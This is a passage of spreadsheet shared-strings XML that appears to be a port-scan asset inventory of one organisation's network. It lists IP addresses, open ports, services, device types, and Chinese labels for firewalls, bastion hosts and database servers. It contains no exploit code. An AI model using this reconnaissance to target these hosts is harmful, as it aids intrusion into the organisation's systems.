  <si>
    <t>192.168.22.52</t>
  </si>
  <si>
    <t>192.168.2.25</t>
  </si>
  <si>
    <t>http(80)
ssl(8443,443)
rtmp(1935)
ssh(22)</t>
  </si>
  <si>
    <t>nginx</t>
  </si>
  <si>
    <t>192.168.1.153</t>
  </si>
  <si>
    <t>printer(515)
soap(3911)
http(8080,8295,80,631)
unknown(8289)</t>
  </si>
  <si>
    <t>HP-LaserJet-Pro(HP-printer)</t>
  </si>
  <si>
    <t>192.168.22.8</t>
  </si>
  <si>
    <t>http(80,5985)
netbios-ssn(139)
msrpc(49667,135,49666)
ms-wbt-server(3389)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI,Microsoft IIS httpd</t>
  </si>
  <si>
    <t>青岛出口防火墙地址</t>
  </si>
  <si>
    <t>192.168.1.1</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
telnet(23)
ssh(22)</t>
  </si>
  <si>
    <t>H3C-Switch</t>
  </si>
  <si>
    <t>天津深信服云脑</t>
  </si>
  <si>
    <t>192.168.22.201</t>
  </si>
  <si>
    <t>http-proxy(3128)
http(80)
ssl(443)</t>
  </si>
  <si>
    <t>nginx
OpenResty
squid 6.14</t>
  </si>
  <si>
    <t>数据平台-管理节点1-大数据管控</t>
  </si>
  <si>
    <t>172.16.5.84</t>
  </si>
  <si>
    <t>1722360212</t>
  </si>
  <si>
    <t>ssh(22)</t>
  </si>
  <si>
    <t>192.168.20.169</t>
  </si>
  <si>
    <t>192.168.17.193</t>
  </si>
  <si>
    <t>192.168.15.7</t>
  </si>
  <si>
    <t>192.168.25.10</t>
  </si>
  <si>
    <t>http(80)
unknown(37777,9704)
d-s-n(8086)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.19.247</t>
  </si>
  <si>
    <t>192.168.32.28</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
unknown(17421,6851,41380)
http(49732)
msrpc(47546,49155,49159,49152,49153,49160,135,49154)</t>
  </si>
  <si>
    <t>192.168.15.4</t>
  </si>
  <si>
    <t>192.168.17.154</t>
  </si>
  <si>
    <t>192.168.17.225</t>
  </si>
  <si>
    <t>成都服务器段网关</t>
  </si>
  <si>
    <t>172.20.34.1</t>
  </si>
  <si>
    <t>192.168.25.153</t>
  </si>
  <si>
    <t>192.168.2.135</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
msrpc(135)</t>
  </si>
  <si>
    <t>192.168.2.184</t>
  </si>
  <si>
    <t>192.168.24.185</t>
  </si>
  <si>
    <t>192.168.24.199</t>
  </si>
  <si>
    <t>192.168.19.205</t>
  </si>
  <si>
    <t>192.168.24.244</t>
  </si>
  <si>
    <t>192.168.22.83</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
tcpwrapped(10050,81)
msrpc(49697,49691,49664,49665,135,49666,49668,49667)
ftp(10083)
http(18099,8190,8092,19850,8085,8118,47001,8311,8020,5985,80,10082,8017,8219,19081,19080,8059,8881,8099)
netbios-ssn(139)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>nginx
Microsoft-HTTPAPI 2.0
indy
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Spring-Framework</t>
  </si>
  <si>
    <t>192.168.22.10</t>
  </si>
  <si>
    <t>sqlexec
MySQL</t>
  </si>
  <si>
    <t>nginx
Microsoft-HTTPAPI 2.0
Apache-Tomcat</t>
  </si>
  <si>
    <t>192.168.16.20</t>
  </si>
  <si>
    <t>adb(5555)</t>
  </si>
  <si>
    <t>192.168.16.35</t>
  </si>
  <si>
    <t>freeciv(5555)</t>
  </si>
  <si>
    <t>192.168.24.2</t>
  </si>
  <si>
    <t>http(80)
unknown(37777,49152)
radan-http(8088)
tcpwrapped(8686)
rtsp(554)</t>
  </si>
  <si>
    <t>Dahua-NVR</t>
  </si>
  <si>
    <t>团队预约平台-数据库服务器2</t>
  </si>
  <si>
    <t>172.16.6.26</t>
  </si>
  <si>
    <t>3036031894</t>
  </si>
  <si>
    <t>mysql(3306)
rpcbind(111)
tcpwrapped(10050)
ssh(22)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>192.168.19.23</t>
  </si>
  <si>
    <t>192.168.23.24</t>
  </si>
  <si>
    <t>192.168.23.122</t>
  </si>
  <si>
    <t>192.168.15.195</t>
  </si>
  <si>
    <t>应用服务器1</t>
  </si>
  <si>
    <t>192.168.22.81</t>
  </si>
  <si>
    <t>2686818893</t>
  </si>
  <si>
    <t>msrpc(52991,49676,49820,49664,49774,49665,135,49674)
ms-wbt-server(3389)
dec-notes(3333)
914c-g(211)
netbios-ssn(139)
tcpwrapped(10050,22)
http(8003,8040,39,5985,8999,80,47001)
microsoft-ds(445)
anet(212)
mcs-calypsoicf(3330)</t>
  </si>
  <si>
    <t>Microsoft IIS httpd(uweb)(web3)
Microsoft-HTTPAPI 2.0
Microsoft IIS httpd</t>
  </si>
  <si>
    <t>Bootstrap(jQuery)(ASP.NET-MVC)
ASP.NET-MVC(jQuery)(Bootstrap)</t>
  </si>
  <si>
    <t>192.168.23.94</t>
  </si>
  <si>
    <t>192.168.22.53</t>
  </si>
  <si>
    <t>sdr(9010)
rtsp(554)
http(80)
tcpwrapped(8443)
hikvision-nvr(8000)
ssl(443)
tambora(9020)</t>
  </si>
  <si>
    <t>192.168.23.79</t>
  </si>
  <si>
    <t>192.168.22.67</t>
  </si>
  <si>
    <t>192.168.22.68</t>
  </si>
  <si>
    <t>192.168.1.31</t>
  </si>
  <si>
    <t>unknown(5040)
ssl(49152)
ms-wbt-server(3389)
tcpwrapped(2425)
scp-config(10001)</t>
  </si>
  <si>
    <t>192.168.88.246</t>
  </si>
  <si>
    <t>192.168.88.247</t>
  </si>
  <si>
    <t>192.168.23.74</t>
  </si>
  <si>
    <t>泛微oa系统-数据库服务器</t>
  </si>
  <si>
    <t>172.16.6.21</t>
  </si>
  <si>
    <t>68909697</t>
  </si>
  <si>
    <t>ms-sql-s(1433)
ms-wbt-server(3389)
msrpc(49218,49152,49154,49229,49221,49155,49153,135)
http(5985,47001)
netbios-ssn(139)
microsoft-ds(445)
tcpwrapped(10050)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>windows 6.3.9600</t>
  </si>
  <si>
    <t>SQL Server 2012</t>
  </si>
  <si>
    <t>122.144.156.34</t>
  </si>
  <si>
    <t>192.168.23.93</t>
  </si>
  <si>
    <t>192.168.19.203</t>
  </si>
  <si>
    <t>192.168.1.157</t>
  </si>
  <si>
    <t>192.168.21.67</t>
  </si>
  <si>
    <t>192.168.17.23</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
netbios-ssn(139)
msrpc(49665,49667,49673,135,49666,49669,49664,49671,49668)
unknown(5040)
microsoft-ds(445)
cefd-vmp(10023)</t>
  </si>
  <si>
    <t>192.168.21.38</t>
  </si>
  <si>
    <t>数据平台-计算存储节点1-emr</t>
  </si>
  <si>
    <t>172.16.6.41</t>
  </si>
  <si>
    <t>3474444277</t>
  </si>
  <si>
    <t>tcpwrapped(33944,37031,39575,42301,42553,10050,37793,42083,36102,33108,42836,39004,38955,44402,34534,42045)
printer(34868)
ssh(22)
unknown(50010)
rpcbind(111)
java-rmi(9604,9619,39129,34206,9602,34782,34567,9601)
mapreduce(13562)
spark(38858,37997)
http(19888,9501,18480,9502,18042,35127,60075,6060,9504,9519)
hadoop-ipc(50020,10020,8485,34593,10033,8040)</t>
  </si>
  <si>
    <t>Apache Spark
Jetty</t>
  </si>
  <si>
    <t>jQuery-ui
Bootstrap(jQuery)</t>
  </si>
  <si>
    <t>天津超融合物理服务器地址</t>
  </si>
  <si>
    <t>192.168.22.25</t>
  </si>
  <si>
    <t>http(80)
ssh(22)
iscsi(3260)
ssl(4433,22001,23020,4480,22010,22012,22041,443,22011,23031)</t>
  </si>
  <si>
    <t>192.168.20.190</t>
  </si>
  <si>
    <t>192.168.4.5</t>
  </si>
  <si>
    <t>x11(6010,6021)
telnet(23)
mbap(502)</t>
  </si>
  <si>
    <t>动物管理系统-备用数据库</t>
  </si>
  <si>
    <t>172.16.6.73</t>
  </si>
  <si>
    <t>649714005</t>
  </si>
  <si>
    <t>离线</t>
  </si>
  <si>
    <t>ms-sql-s(1433)
ms-wbt-server(3389)
http(5985,80,47001)
ms-olap4(2383)
msrpc(49152,49156,49154,49155,49157,49153,49763,135)
netbios-ssn(139)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>SQL Server 2016</t>
  </si>
  <si>
    <t>192.168.100.31</t>
  </si>
  <si>
    <t>192.168.1.26</t>
  </si>
  <si>
    <t>msrpc(135)
enpp(2968)
unknown(5040)
scp-config(10001)
netbios-ssn(139)
microsoft-ds(445)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>青岛堡垒机</t>
  </si>
  <si>
    <t>192.168.1.117</t>
  </si>
  <si>
    <t>堡垒机</t>
  </si>
  <si>
    <t>msrpc(49668,49670,49664,49669,135,49693,49665)
pando-pub(7680)
unknown(5040)
http(5357)
netbios-ssn(139)
iqrm(10117)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>219.147.9.110</t>
  </si>
  <si>
    <t>192.168.1.65</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
unknown(5040)
bandwidth-test(19991)
netbios-ssn(139)
microsoft-ds(445)
msrpc(49665,49664,49667,49666,49676,135,49669,1029,1047)</t>
  </si>
  <si>
    <t>192.168.20.180</t>
  </si>
  <si>
    <t>192.168.19.34</t>
  </si>
  <si>
    <t>192.168.19.184</t>
  </si>
  <si>
    <t>192.168.19.45</t>
  </si>
  <si>
    <t>192.168.20.149</t>
  </si>
  <si>
    <t>192.168.1.229</t>
  </si>
  <si>
    <t>192.168.1.239</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
msrpc(135)
ms-wbt-server(3389)
unknown(5823,5040)</t>
  </si>
  <si>
    <t>192.168.19.139</t>
  </si>
  <si>
    <t>192.168.19.15</t>
  </si>
  <si>
    <t>192.168.20.214</t>
  </si>
  <si>
    <t>192.168.19.158</t>
  </si>
  <si>
    <t>192.168.1.6</t>
  </si>
  <si>
    <t>192.168.16.33</t>
  </si>
  <si>
    <t>192.168.17.208</t>
  </si>
  <si>
    <t>pando-pub(7680)
ms-wbt-server(3389)
http(5357)
unknown(55816,5040,10208)
msrpc(49667,49689,49665,49670,135,49664,49666,49686,49668)
ssl(5521,5526)
netbios-ssn(139)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>192.168.17.20</t>
  </si>
  <si>
    <t>microsoft-ds(445)
msrpc(135,49153,49152,49155,49154,49168,49156)
netbios-ssn(139)
abb-hw(10020)</t>
  </si>
  <si>
    <t>192.168.20.2</t>
  </si>
  <si>
    <t>192.168.1.166</t>
  </si>
  <si>
    <t>microsoft-ds(445)
netbios-ssn(139)
msrpc(135)
unknown(5040)
http(5357)</t>
  </si>
  <si>
    <t>192.168.31.10</t>
  </si>
  <si>
    <t>http(80)
tcpwrapped(8000)</t>
  </si>
  <si>
    <t>天津上网行为管理</t>
  </si>
  <si>
    <t>192.168.22.22</t>
  </si>
  <si>
    <t>ssl(61111,443)
ssh(22345)
http(100,85,89,9998,817,80)
unknown(61182)</t>
  </si>
  <si>
    <t>homepage</t>
  </si>
  <si>
    <t>homepage(Sangfor-AC)</t>
  </si>
  <si>
    <t>无(Sangfor Technologies Inc.)</t>
  </si>
  <si>
    <t>192.168.7.158</t>
  </si>
  <si>
    <t>192.168.7.169</t>
  </si>
  <si>
    <t>192.168.9.10</t>
  </si>
  <si>
    <t>ssl(443,990)
davsrc(9800)
golem(9005)
iua(9900)
ssh(22)
zeus-admin(9090)
pwgpsi(3800)
rtsp(9320)
http(8081,9000,9201,7087,80,7086)
tor-orport(9001)
wap-wsp(9200)
board-roar(9700)
sec-t4net-srv(9400)
micromuse-ncpw(9600)
unknown(9319,9099,9115,12366)
tcpwrapped(7096,7097,9322)</t>
  </si>
  <si>
    <t>Apache-Tomcat</t>
  </si>
  <si>
    <t>Selene-Digital video surveillance,Apache-Tomcat</t>
  </si>
  <si>
    <t>192.168.100.52</t>
  </si>
  <si>
    <t>Ruijie-Switch</t>
  </si>
  <si>
    <t>中间层服务器（前场-散客与团客）-1</t>
  </si>
  <si>
    <t>192.168.1.11</t>
  </si>
  <si>
    <t>876730830</t>
  </si>
  <si>
    <t>192.168.7.107</t>
  </si>
  <si>
    <t>192.168.7.109</t>
  </si>
  <si>
    <t>192.168.7.103</t>
  </si>
  <si>
    <t>192.168.7.192</t>
  </si>
  <si>
    <t>192.168.7.178</t>
  </si>
  <si>
    <t>192.168.24.3</t>
  </si>
  <si>
    <t>192.168.20.166</t>
  </si>
  <si>
    <t>192.168.24.105</t>
  </si>
  <si>
    <t>rtmp(1935)
unknown(37777)
http(8086,80)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.24.107</t>
  </si>
  <si>
    <t>192.168.1.90</t>
  </si>
  <si>
    <t>192.168.7.125</t>
  </si>
  <si>
    <t>192.168.7.139</t>
  </si>
  <si>
    <t>192.168.19.103</t>
  </si>
  <si>
    <t>192.168.1.43</t>
  </si>
  <si>
    <t>msrpc(49152,49157,49154,49153,135)
netbios-ssn(139)
ms-sql-s(1433)
ms-wbt-server(3389)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>SQL Server 2000</t>
  </si>
  <si>
    <t>192.168.7.41</t>
  </si>
  <si>
    <t xml:space="preserve">unix </t>
  </si>
  <si>
    <t>192.168.7.230</t>
  </si>
  <si>
    <t>192.168.8.20</t>
  </si>
  <si>
    <t>192.168.7.94</t>
  </si>
  <si>
    <t>192.168.8.113</t>
  </si>
  <si>
    <t>192.168.7.99</t>
  </si>
  <si>
    <t>192.168.8.123</t>
  </si>
  <si>
    <t>192.168.8.103</t>
  </si>
  <si>
    <t>192.168.8.105</t>
  </si>
  <si>
    <t>192.168.8.42</t>
  </si>
  <si>
    <t>192.168.8.101</t>
  </si>
  <si>
    <t>192.168.8.110</t>
  </si>
  <si>
    <t>192.168.8.139</t>
  </si>
  <si>
    <t>192.168.19.39</t>
  </si>
  <si>
    <t>192.168.7.225</t>
  </si>
  <si>
    <t>192.168.7.56</t>
  </si>
  <si>
    <t>192.168.24.68</t>
  </si>
  <si>
    <t>192.168.19.161</t>
  </si>
  <si>
    <t>192.168.20.150</t>
  </si>
  <si>
    <t>192.168.19.56</t>
  </si>
  <si>
    <t>192.168.24.70</t>
  </si>
  <si>
    <t>192.168.24.115</t>
  </si>
  <si>
    <t>192.168.100.137</t>
  </si>
  <si>
    <t>telnet(23)
http(80)
ssl(443)
ssh(22)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>192.168.8.21</t>
  </si>
  <si>
    <t>192.168.8.24</t>
  </si>
  <si>
    <t>192.168.19.104</t>
  </si>
  <si>
    <t>192.168.7.152</t>
  </si>
  <si>
    <t>192.168.18.103</t>
  </si>
  <si>
    <t>192.168.7.1</t>
  </si>
  <si>
    <t>192.168.100.50</t>
  </si>
  <si>
    <t>192.168.0.52</t>
  </si>
  <si>
    <t>http(80)
d-star(9011)
printer(515)
ogs-client(9007)
unknown(9015,9017,47546,9014,47545)</t>
  </si>
  <si>
    <t>Canon-imageRUNNER2520i</t>
  </si>
  <si>
    <t>192.168.2.42</t>
  </si>
  <si>
    <t>ssh(22)
oracle-tns(1521)</t>
  </si>
  <si>
    <t>192.168.24.42</t>
  </si>
  <si>
    <t>192.168.24.58</t>
  </si>
  <si>
    <t>192.168.7.101</t>
  </si>
  <si>
    <t>192.168.7.102</t>
  </si>
  <si>
    <t>192.168.20.220</t>
  </si>
  <si>
    <t>192.168.20.134</t>
  </si>
  <si>
    <t>192.168.20.195</t>
  </si>
  <si>
    <t>192.168.100.166</t>
  </si>
  <si>
    <t>192.168.100.156</t>
  </si>
  <si>
    <t>192.168.7.151</t>
  </si>
  <si>
    <t>192.168.17.251</t>
  </si>
  <si>
    <t>mongod(27018)
msrpc(49665,49667,49670,135,49666,49669,49686,49671,49668)
tcpwrapped(5040)
mysql(3306)
netbios-ssn(139)
ms-wbt-server(4490)
microsoft-ds(445)
http(50551,37989)
ms-sql-s(61433)</t>
  </si>
  <si>
    <t>mongod
MySQL</t>
  </si>
  <si>
    <t>192.168.16.23</t>
  </si>
  <si>
    <t>192.168.22.11</t>
  </si>
  <si>
    <t>192.168.7.200</t>
  </si>
  <si>
    <t>192.168.7.12</t>
  </si>
  <si>
    <t>192.168.24.169</t>
  </si>
  <si>
    <t>192.168.23.180</t>
  </si>
  <si>
    <t>tcpwrapped(30999,30960)
hikvision-nvr(8000)
http(80,7681)
rtsp(554)</t>
  </si>
  <si>
    <t>Hikvision-IP CAMERA,Hikvision-NVR(hikvision-camera)</t>
  </si>
  <si>
    <t>192.168.16.49</t>
  </si>
  <si>
    <t>192.168.24.136</t>
  </si>
  <si>
    <t>upnp(49152)
mit-ml-dev(85)
rtsp(554)
uniview-http(80)
soap(81)</t>
  </si>
  <si>
    <t>Uniview-Video Surveillance Device,UPnP/1.0,-Portable-SDK-for-UPnP-devices</t>
  </si>
  <si>
    <t>192.168.24.143</t>
  </si>
  <si>
    <t>192.168.24.139</t>
  </si>
  <si>
    <t>192.168.24.145</t>
  </si>
  <si>
    <t>武汉数据库服务器集群vip</t>
  </si>
  <si>
    <t>192.168.4.201</t>
  </si>
  <si>
    <t>448981398</t>
  </si>
  <si>
    <t>oracle-tns(54865)
status(64439)</t>
  </si>
  <si>
    <t>192.168.19.206</t>
  </si>
  <si>
    <t>数据平台-MySQL主节点-平台层用户业务数据</t>
  </si>
  <si>
    <t>172.16.6.55</t>
  </si>
  <si>
    <t>2641538933</t>
  </si>
  <si>
    <t>MySQL
Redis
MySQL X protocol listener</t>
  </si>
  <si>
    <t>Jetty 9.4.24.v20191120</t>
  </si>
  <si>
    <t>中间层服务器-历史库查询的前端应用-1</t>
  </si>
  <si>
    <t>192.168.1.100</t>
  </si>
  <si>
    <t>3580846476</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
dec-notes(3333)
msmq(1801)
ftp(10083)
http(2021,10082,808,80,6000,2022,8085)
914c-g(211)
netbios-ssn(139)
tcpwrapped(21,81)
msrpc(2103,2105,135,2107)
redis(6379)
microsoft-ds(445)
anet(212)</t>
  </si>
  <si>
    <t>Redis</t>
  </si>
  <si>
    <t>60.209.248.165</t>
  </si>
  <si>
    <t>数据平台-EM服务-运维管家</t>
  </si>
  <si>
    <t>172.16.5.82</t>
  </si>
  <si>
    <t>502700887</t>
  </si>
  <si>
    <t>mysql(3306)
ssh(22)
rpcbind(111)
ddi-tcp-3(8890)
http(9090,80,8889,8864)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>Handlebars(jQuery)(Bootstrap)</t>
  </si>
  <si>
    <t>Prometheus</t>
  </si>
  <si>
    <t>SoundCloud</t>
  </si>
  <si>
    <t>192.168.19.130</t>
  </si>
  <si>
    <t>192.168.19.68</t>
  </si>
  <si>
    <t>soap(8899)
http-alt(8000)
tcpwrapped(80)
rtsp(554)
dhanalakshmi(34567)
unknown(9530,34561)</t>
  </si>
  <si>
    <t>192.168.19.252</t>
  </si>
  <si>
    <t>192.168.20.171</t>
  </si>
  <si>
    <t>192.168.20.137</t>
  </si>
  <si>
    <t>192.168.19.51</t>
  </si>
  <si>
    <t>192.168.19.193</t>
  </si>
  <si>
    <t>NETSurveillance(Xiongmai-Cameras-and-Surveillance),DVR</t>
  </si>
  <si>
    <t>192.168.19.133</t>
  </si>
  <si>
    <t>192.168.100.117</t>
  </si>
  <si>
    <t>192.168.100.123</t>
  </si>
  <si>
    <t>192.168.100.121</t>
  </si>
  <si>
    <t>192.168.100.105</t>
  </si>
  <si>
    <t>192.168.19.92</t>
  </si>
  <si>
    <t>192.168.1.201</t>
  </si>
  <si>
    <t>192.168.20.206</t>
  </si>
  <si>
    <t>192.168.21.53</t>
  </si>
  <si>
    <t>192.168.19.154</t>
  </si>
  <si>
    <t>192.168.19.190</t>
  </si>
  <si>
    <t>192.168.23.10</t>
  </si>
  <si>
    <t>unknown(37777)
avt-profile-2(5005)
rtsp(554)
http(80)
radan-http(8088)
upnp(5000)</t>
  </si>
  <si>
    <t>Bootstrap(jQuery)(Angular)</t>
  </si>
  <si>
    <t>Dahua-Edge computing station</t>
  </si>
  <si>
    <t>192.168.21.47</t>
  </si>
  <si>
    <t>192.168.21.97</t>
  </si>
  <si>
    <t>unknown(10016)
jamlink(8091)
tcpwrapped(555)
ppp(3000)
http(80,554)</t>
  </si>
  <si>
    <t>192.168.21.137</t>
  </si>
  <si>
    <t>192.168.21.95</t>
  </si>
  <si>
    <t>unknown(10016)
dsf(555)
rtsp(554)
http(80)
jamlink(8091)
ppp(3000)</t>
  </si>
  <si>
    <t>192.168.1.205</t>
  </si>
  <si>
    <t>192.168.1.198</t>
  </si>
  <si>
    <t>192.168.21.112</t>
  </si>
  <si>
    <t>192.168.1.150</t>
  </si>
  <si>
    <t>unknown(65021,5040)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>192.168.21.12</t>
  </si>
  <si>
    <t>rtsp(554)
dhanalakshmi(34567)
http(80)
unknown(9527,9530,34599)
telnet(23)
soap(8180)</t>
  </si>
  <si>
    <t>192.168.21.138</t>
  </si>
  <si>
    <t>192.168.21.143</t>
  </si>
  <si>
    <t>192.168.21.119</t>
  </si>
  <si>
    <t>192.168.21.29</t>
  </si>
  <si>
    <t>192.168.1.247</t>
  </si>
  <si>
    <t>http(4430)
ssl(443)</t>
  </si>
  <si>
    <t>Archive</t>
  </si>
  <si>
    <t>clipboard.js</t>
  </si>
  <si>
    <t>Archive(Sangfor-SSL VPN client)</t>
  </si>
  <si>
    <t>101.204.24.178</t>
  </si>
  <si>
    <t>192.168.20.233</t>
  </si>
  <si>
    <t>pwgpsi(3800)
unknown(37777)
upnp(49152,5000)
rtsp(554)
http(80)
ssl(37776)
telnet(23)</t>
  </si>
  <si>
    <t>Dahua dh-itc215-pu1b entrance and exit integrated capture camera</t>
  </si>
  <si>
    <t>成都上网行为管理</t>
  </si>
  <si>
    <t>172.20.34.16</t>
  </si>
  <si>
    <t>ssl(61111,443)
ssh(22345)
http(89,80,100,85,9998,817)
unknown(61182)</t>
  </si>
  <si>
    <t>192.168.0.219</t>
  </si>
  <si>
    <t>192.168.16.60</t>
  </si>
  <si>
    <t>成都数据还原测试服务器</t>
  </si>
  <si>
    <t>192.168.9.210</t>
  </si>
  <si>
    <t>tcpwrapped(22)</t>
  </si>
  <si>
    <t>192.168.24.20</t>
  </si>
  <si>
    <t>192.168.20.212</t>
  </si>
  <si>
    <t>192.168.20.156</t>
  </si>
  <si>
    <t>192.168.1.10</t>
  </si>
  <si>
    <t>青岛备份一体机-远程控制卡</t>
  </si>
  <si>
    <t>192.168.1.8</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
ssh(22)</t>
  </si>
  <si>
    <t>Angular(Bootstrap)
Bootstrap(Angular)</t>
  </si>
  <si>
    <t>Apache Software Foundation</t>
  </si>
  <si>
    <t>192.168.24.5</t>
  </si>
  <si>
    <t>http(80)
unknown(37777,49152)
radan-http(8088)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.22.56</t>
  </si>
  <si>
    <t>tcpwrapped(322)
sdr(9010)
rtsp(554)
http(80)
hikvision-nvr(8000)
ssl(443)
tambora(9020)</t>
  </si>
  <si>
    <t>192.168.19.62</t>
  </si>
  <si>
    <t>192.168.23.62</t>
  </si>
  <si>
    <t>192.168.1.106</t>
  </si>
  <si>
    <t>http(80)
ssl(443)
ilo-vm(17988)
ssh(22)</t>
  </si>
  <si>
    <t>192.168.19.95</t>
  </si>
  <si>
    <t>192.168.19.13</t>
  </si>
  <si>
    <t>192.168.23.44</t>
  </si>
  <si>
    <t>192.168.23.76</t>
  </si>
  <si>
    <t>192.168.19.8</t>
  </si>
  <si>
    <t>192.168.22.72</t>
  </si>
  <si>
    <t>192.168.23.59</t>
  </si>
  <si>
    <t>192.168.17.131</t>
  </si>
  <si>
    <t>192.168.23.38</t>
  </si>
  <si>
    <t>192.168.23.108</t>
  </si>
  <si>
    <t>192.168.22.74</t>
  </si>
  <si>
    <t>武汉收银pc电脑</t>
  </si>
  <si>
    <t>192.168.4.160</t>
  </si>
  <si>
    <t>192.168.16.48</t>
  </si>
  <si>
    <t>192.168.2.236</t>
  </si>
  <si>
    <t>192.168.1.140</t>
  </si>
  <si>
    <t>天津超融合集群地址</t>
  </si>
  <si>
    <t>192.168.22.24</t>
  </si>
  <si>
    <t>http(80)
ssh(22)
iscsi(3260)
ssl(4433,22001,23020,4480,22010,22041,443,22011,23031)</t>
  </si>
  <si>
    <t>192.168.1.220</t>
  </si>
  <si>
    <t>192.168.20.194</t>
  </si>
  <si>
    <t>192.168.1.221</t>
  </si>
  <si>
    <t>192.168.4.221</t>
  </si>
  <si>
    <t>msrpc(49667,49665,135,2107,49691,2103,2105,49694,49664,49666,49669,49668)
ms-wbt-server(3389)
dec-notes(3333)
http(9993,39,8881,8040,19081,47001,9994,8092,80,8021,5985,9995,19080,9996,9992,6000,9997,10082,9991,9190,8017)
msmq(1801)
ftp(10083)
914c-g(211)
netbios-ssn(139)
redis(6379)
microsoft-ds(445)
anet(212)
tcpwrapped(10050,81,2121)</t>
  </si>
  <si>
    <t>Spring-Framework
Bootstrap(jQuery)(ASP.NET-MVC)
Bootstrap(ASP.NET-MVC)(jQuery)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI,indy,Microsoft IIS httpd</t>
  </si>
  <si>
    <t>192.168.7.160</t>
  </si>
  <si>
    <t>192.168.7.166</t>
  </si>
  <si>
    <t>192.168.7.130</t>
  </si>
  <si>
    <t>192.168.7.203</t>
  </si>
  <si>
    <t>192.168.7.174</t>
  </si>
  <si>
    <t>192.168.7.100</t>
  </si>
  <si>
    <t>192.168.7.215</t>
  </si>
  <si>
    <t>192.168.7.154</t>
  </si>
  <si>
    <t>192.168.7.180</t>
  </si>
  <si>
    <t>192.168.7.191</t>
  </si>
  <si>
    <t>192.168.7.208</t>
  </si>
  <si>
    <t>192.168.7.123</t>
  </si>
  <si>
    <t>192.168.7.188</t>
  </si>
  <si>
    <t>192.168.7.213</t>
  </si>
  <si>
    <t>192.168.7.112</t>
  </si>
  <si>
    <t>192.168.7.149</t>
  </si>
  <si>
    <t>192.168.7.164</t>
  </si>
  <si>
    <t>192.168.7.138</t>
  </si>
  <si>
    <t>192.168.7.143</t>
  </si>
  <si>
    <t>192.168.7.171</t>
  </si>
  <si>
    <t>192.168.7.142</t>
  </si>
  <si>
    <t>192.168.7.173</t>
  </si>
  <si>
    <t>192.168.0.72</t>
  </si>
  <si>
    <t>daytime(13)
time(37)
unknown(63630)
echo(7)
rpcbind(111)
vcmp(2426)
ssl(8009,443)
telnet(23)
fjitsuappmgr(2425)
http(60099,80,8008,7100,7000)</t>
  </si>
  <si>
    <t>UPnP/1.0-DLNADOC/1.50-AirReceiver/,POSIX,-UPnP/1.0,-Intel-MicroStack/1.0.2777,CDN of the jQuery official website(Lighttpd)</t>
  </si>
  <si>
    <t>192.168.7.118</t>
  </si>
  <si>
    <t>192.168.7.20</t>
  </si>
  <si>
    <t>192.168.7.145</t>
  </si>
  <si>
    <t>192.168.7.182</t>
  </si>
  <si>
    <t>192.168.7.196</t>
  </si>
  <si>
    <t>192.168.7.205</t>
  </si>
  <si>
    <t>192.168.7.141</t>
  </si>
  <si>
    <t>192.168.7.135</t>
  </si>
  <si>
    <t>192.168.7.172</t>
  </si>
  <si>
    <t>192.168.7.18</t>
  </si>
  <si>
    <t>192.168.7.214</t>
  </si>
  <si>
    <t>192.168.7.195</t>
  </si>
  <si>
    <t>192.168.7.133</t>
  </si>
  <si>
    <t>192.168.7.16</t>
  </si>
  <si>
    <t>192.168.7.108</t>
  </si>
  <si>
    <t>192.168.7.156</t>
  </si>
  <si>
    <t>192.168.7.185</t>
  </si>
  <si>
    <t>192.168.7.124</t>
  </si>
  <si>
    <t>192.168.7.14</t>
  </si>
  <si>
    <t>192.168.7.206</t>
  </si>
  <si>
    <t>192.168.7.186</t>
  </si>
  <si>
    <t>192.168.7.190</t>
  </si>
  <si>
    <t>192.168.7.201</t>
  </si>
  <si>
    <t>192.168.7.121</t>
  </si>
  <si>
    <t>192.168.7.126</t>
  </si>
  <si>
    <t>192.168.7.19</t>
  </si>
  <si>
    <t>192.168.7.217</t>
  </si>
  <si>
    <t>192.168.7.198</t>
  </si>
  <si>
    <t>192.168.7.140</t>
  </si>
  <si>
    <t>192.168.7.114</t>
  </si>
  <si>
    <t>192.168.7.197</t>
  </si>
  <si>
    <t>192.168.7.111</t>
  </si>
  <si>
    <t>192.168.7.187</t>
  </si>
  <si>
    <t>192.168.7.199</t>
  </si>
  <si>
    <t>192.168.7.165</t>
  </si>
  <si>
    <t>192.168.7.216</t>
  </si>
  <si>
    <t>192.168.7.184</t>
  </si>
  <si>
    <t>192.168.7.106</t>
  </si>
  <si>
    <t>192.168.7.15</t>
  </si>
  <si>
    <t>192.168.7.11</t>
  </si>
  <si>
    <t>192.168.7.119</t>
  </si>
  <si>
    <t>192.168.7.163</t>
  </si>
  <si>
    <t>192.168.7.211</t>
  </si>
  <si>
    <t>192.168.7.129</t>
  </si>
  <si>
    <t>192.168.7.181</t>
  </si>
  <si>
    <t>192.168.7.150</t>
  </si>
  <si>
    <t>192.168.7.212</t>
  </si>
  <si>
    <t>192.168.7.161</t>
  </si>
  <si>
    <t>192.168.7.177</t>
  </si>
  <si>
    <t>192.168.7.189</t>
  </si>
  <si>
    <t>192.168.7.115</t>
  </si>
  <si>
    <t>192.168.7.120</t>
